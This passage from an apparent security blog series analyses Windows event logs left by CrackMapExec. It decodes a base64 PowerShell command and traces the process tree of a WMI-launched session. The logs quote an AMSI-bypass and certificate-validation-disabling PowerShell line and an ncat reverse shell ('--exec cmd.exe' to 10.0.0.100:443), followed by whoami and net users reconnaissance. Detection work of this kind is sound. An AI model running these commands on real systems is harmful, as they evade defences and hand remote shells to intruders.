 Process Command Line: cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1


The above command line is nothing to worry about at this time. This is base64 encoded and thus can be decoded relatively easily. To do this, let's copy the following string into a text file.


WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==

In my case I named the text file "securityNik-b64.encoded". Now that I have this file, I will leverage "certutil.exe" on my Windows  10 analysis machine, to decode this text.


c:\Users\Security Nik>certutil -decode -f c:\tmp\securityNik-b64.encoded c:\tmp\securityNik-b64.decoded
Input Length = 632
Output Length = 472
CertUtil: -decode command completed successfully.

c:\Users\Security Nik>type c:\tmp\securityNik-b64.decoded
[ N e t . S e r v i c e P o i n t M a n a g e r ] : : S e r v e r C e r t i f i c a t  V a l i d a t i o n C a l l b a c k   =   { $ t r u e } ;
 t r y {
 [ R e f ] . A s s e m b l y . G e t T y p e ( ' S y s t e m . M a n a g e m e n t . A u t o m a t i o n . A m s i U t i l s ' ) . G e t F i e l d ( ' a m s i I n i t F a i  e d ' ,   ' N o n P u b l i c , S t a t i c ' ) . S e t V a l u e ( $ n u l l ,   $ t  u e )
 } c a t c h { }
 g e t - p r o c e s s

Ahhhh! Finally, we are able to see above the command which was executed. It took us a while to get here but we did. No need to worry about the spaces between the characters. This is because this is Unicode or 2 bytes (16 bits) values.

Finally we see the account logoff for logon ID "0xB48AC1"


04/18/2019 01:33:01 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172622
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Logon Type:   3

Good stuff! We solved that challenge.

Let's move on to the last part of this post. As we look at this last part in which "ncat.exe" was executed, let's see what we might be able to learn from them. As we go through this section, note I'm leaving out some of the activiies as it similar to what we have seen above. As in for example accessing the share "\\*\C$" as well as creating and deleting temporary files such as "Windows\Temp\HxuzLk" and having process command lines such as "cmd.exe /Q /c cd  1> \\127.0.0.1\C$\Windows\Temp\HxuzLk 2>&1". Rather than repeat what is above, let's instead focus on the more relevant items.

We see below that similar to the Powershell command, when the "netcat.exe" is executed below, it


04/18/2019 11:09:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196801
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x426A10

Process Information:
 New Process ID:  0x8a8
 New Process Name: C:\Windows\System32\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x1164
 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\iKxsfQ 2>&1

At this point, since we have the log above, we are better off taking the logon ID "0x426A10" and search for all activities associated with it. However, when I did this I did not find the "whoami" and "net users" log entries. As a result, I had to continue stepping through my logs looking at the activities after the time above. As I stepped through, I recognized there are a number of logon and logoff that would have resulted in me not seeing the "whoami" under this session as every new session should generate a new logon ID. However, these logons still all display similar characteristics with the access they request and the files they create.

As I stepped through the logs, I recognize I hit the jackpot. Let's walk through this.

The next log is where it all begins. Let's build our tree.

From below, the "cmd.exe" process with PID "0xb94" was created by the "WmiPrvSE.exe" process with PID "0x1bc".  The "cmd.exe" process has quite an interesting command line.


start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94)


04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196910
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Process Information:
 New Process ID:  0xb94
 New Process Name: C:\Windows\System32\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x1bc
 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1

As we look at the next log entry seen below that "cmd.exe" with PID (0xb94) has spawned "connhost.exe" with PID "0xb4"


start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 


04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196911
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0xb4
 New Process Name: C:\Windows\System32\conhost.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb94
 Creator Process Name: C:\Windows\System32\cmd.exe
 Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Continuing our log analysis, we see below that the "cmd.exe" process with PID "0xb94" now spawns "c:\tools\ncat.exe" with PID "0x9e8". We can also see the "ncat.exe" connecting to a device at 10.0.0.100 on port 443. Interesting!


         -> ncat.exe (0x9e8)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 


04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196919
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x9e8
 New Process Name: C:\Tools\ncat.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb94
 Creator Process Name: C:\Windows\System32\cmd.exe
 Process Command Line: c:\tools\ncat.exe  --nodns --exec cmd.exe 10.0.0.100 443 

Next we see the "ncat.exe" process with PID "0x9e8" spawing a shell "cmd.exe" with PID "0xb4c".


         -> ncat.exe (0x9e8) -> cmd.exe (0x4bc)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 


04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196925
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0xb4c
 New Process Name: C:\Windows\SysWOW64\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x9e8
 Creator Process Name: C:\Tools\ncat.exe
 Process Command Line: cmd.exe

Looking below, we now see a "cmd.exe" process with PID "0xb4c" spawing a process named "whoami.exe" with PID "0xe60"


         -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 


04/18/2019 11:11:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196959
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0
 
Process Information:
 New Process ID:  0xe60
 New Process Name: C:\Windows\SysWOW64\whoami.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb4c
 Creator Process Name: C:\Windows\SysWOW64\cmd.exe
 Process Command Line: whoami

Next up we see below, the "cmd.exe" process with PID "0x4bc" exeuting the "net.exe" process with PID "0x1360" Notice the command line for this is executing "net users".


                 -> net.exe (0x1360)
               /
         -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60)
        
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 


04/18/2019 11:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196966
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x13f0
 New Process Name: C:\Windows\SysWOW64\net.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb4c
 Creator Process Name: C:\Windows\SysWOW64\cmd.exe
 Process Command Line: net  users

Finally, we see "net.exe" process with PID "0x13f0" spawning the "net1.exe" process with PID "0x570"


                 -> net.exe (0x1360) -> net1.exe (0x570)
               /
         -> ncat.exe (0x9e8) -> cmd.exe (0x4bc) -> whoami.exe (0xe60)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> connhost.exe (0xb4) 


04/18/2019 11:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196967
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x570
 New Process Name: C:\Windows\SysWOW64\net1.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x13f0
 Creator Process Name: C:\Windows\SysWOW64\net.exe
 Process Command Line: C:\Windows\system32\net1  users

Ok! So now we have a reasonable amount of intelligence into how we can use our logs to see the activity crackmapexec performs on a system. obviously, you will need to have the appropriate level of logging in place to be able to make the most out of this.

See the rests of the posts below on how we do raw packet analsis leveraging "tshark", along with using tools such as Snort and Bro ... sorry Zeek.


References:
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4661
https://www.ultimatewindowssecurity.com/securitylog/book/page.aspx?spid=chapter7
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4661
https://docs.microsoft.com/en-us/windows/desktop/ADSchema/attributes-all
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/177c0db5-fa12-4c31-b75a-473425ce9cca
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada1/ac2852b7-cbca-4495-8e66-74fa34bcff59
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-ada3/a499e86b-daa7-463c-bf3a-f052560b0ccf
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=5140
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5145
https://www.morgantechspace.com/2013/10/Event-ID-5145-Detailed-File-Share-Auditing.html

Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis

No comments:

Post a Comment